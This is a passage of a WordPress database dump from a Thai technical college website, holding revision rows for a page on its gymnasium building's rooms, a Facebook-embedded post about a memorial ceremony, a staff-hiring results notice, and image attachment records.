(สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"882\" height=\"497\" />\r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-16 15:43:59', '2018-10-16 08:43:59', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4128, 3, '2018-10-16 15:45:05', '2018-10-16 08:45:05', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 จำนวน </strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม</span></strong>\r\n\r\n<strong><span style=\"color: #800000;\"><img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"882\" height=\"497\" />\r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-16 15:45:05', '2018-10-16 08:45:05', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4130, 3, '2018-10-17 08:45:21', '2018-10-17 01:45:21', '', '44043509_691289487913909_769305393779179520_o', '', 'inherit', 'closed', 'closed', '', '44043509_691289487913909_769305393779179520_o', '', '', '2018-10-17 08:45:21', '2018-10-17 01:45:21', '', 4107, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/44043509_691289487913909_769305393779179520_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4131, 3, '2018-10-17 08:45:48', '2018-10-17 01:45:48', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D691290641247127%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันเสาร์ที่ 13 ตุลาคม 2561 ดร.ภูมิพัฒน์ แก้วมูล รองผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู ร่วมพิธีบำเพ็ญพระราชกุศลและถวายพวงมาลา เนื่องในวันคล้ายวันสวรรคตพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช บรมราชบพิตร ณ สวนศรีเมือง อำเภอเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '4107-revision-v1', '', '', '2018-10-17 08:45:48', '2018-10-17 01:45:48', '', 4107, 'http://www.technicrayong.ac.th/4107-revision-v1/', 0, 'revision', '', 0),
(4132, 3, '2018-10-17 09:10:34', '2018-10-17 02:10:34', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 </strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 3 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม</span></strong>\r\n\r\n<strong><span style=\"color: #800000;\"><img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"882\" height=\"497\" />\r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-17 09:10:34', '2018-10-17 02:10:34', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4133, 3, '2018-10-17 09:11:11', '2018-10-17 02:11:11', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 </strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม</span></strong>\r\n\r\n<strong><span style=\"color: #800000;\"><img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"882\" height=\"497\" />\r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-17 09:11:11', '2018-10-17 02:11:11', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4134, 3, '2018-10-17 09:13:36', '2018-10-17 02:13:36', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 </strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม</span></strong>\r\n\r\n<strong><span style=\"color: #800000;\"><img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"882\" height=\"497\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 2</strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.ห้องงานกิจกรรม</span></strong>\r\n\r\n<img class=\" wp-image-4125 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1686.jpg\" alt=\"\" width=\"887\" height=\"499\" />\r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-17 09:13:36', '2018-10-17 02:13:36', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4135, 3, '2018-10-17 09:14:40', '2018-10-17 02:14:40', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 </strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม</span></strong>\r\n\r\n<strong><span style=\"color: #800000;\"><img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"882\" height=\"497\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 2</strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.ห้องงานกิจกรรม</span></strong>\r\n\r\n<img class=\" wp-image-4125 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1686.jpg\" alt=\"\" width=\"887\" height=\"499\" />\r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-17 09:14:40', '2018-10-17 02:14:40', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4136, 3, '2018-10-17 09:16:21', '2018-10-17 02:16:21', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 </strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม</span></strong>\r\n\r\n<strong><span style=\"color: #800000;\"><img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"882\" height=\"497\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 2</strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.ห้องงานกิจกรรม</span></strong>\r\n\r\n<img class=\" wp-image-4125 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1686.jpg\" alt=\"\" width=\"887\" height=\"499\" />\r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-17 09:16:21', '2018-10-17 02:16:21', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4137, 3, '2018-10-17 09:41:44', '2018-10-17 02:41:44', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 </strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม</span></strong>\r\n\r\n<strong><span style=\"color: #800000;\"><img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"880\" height=\"495\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n \r\n<h2></h2>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 2</strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.ห้องงานกิจกรรม</span></strong>\r\n\r\n<img class=\" wp-image-4125 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1686.jpg\" alt=\"\" width=\"887\" height=\"499\" />\r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-17 09:41:44', '2018-10-17 02:41:44', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4139, 3, '2018-10-18 18:26:46', '2018-10-18 11:26:46', '<img class=\"aligncenter size-full wp-image-4142\" src=\"/wp-content/uploads/2018/10/1539860875337-1.jpg\" alt=\"\" width=\"1108\" height=\"1477\" /> <img class=\"aligncenter size-full wp-image-4141\" src=\"/wp-content/uploads/2018/10/1539860879873.jpg\" alt=\"\" width=\"1108\" height=\"1477\" />', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน 9 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-6', '', '', '2018-10-18 18:44:23', '2018-10-18 11:44:23', '', 0, 'http://www.technicrayong.ac.th/?p=4139', 270, 'post', '', 0),
(4140, 3, '2018-10-18 18:13:55', '2018-10-18 11:13:55', '', '1539860875337', '', 'inherit', 'closed', 'closed', '', '1539860875337', '', '', '2018-10-18 18:13:55', '2018-10-18 11:13:55', '', 4139, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/1539860875337.jpg', 0, 'attachment', 'image/jpeg', 0),
(4141, 3, '2018-10-18 18:14:36', '2018-10-18 11:14:36', '', '1539860879873', '', 'inherit', 'closed', 'closed', '', '1539860879873', '', '', '2018-10-18 18:14:36', '2018-10-18 11:14:36', '', 4139, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/1539860879873.jpg', 0, 'attachment', 'image/jpeg', 0),
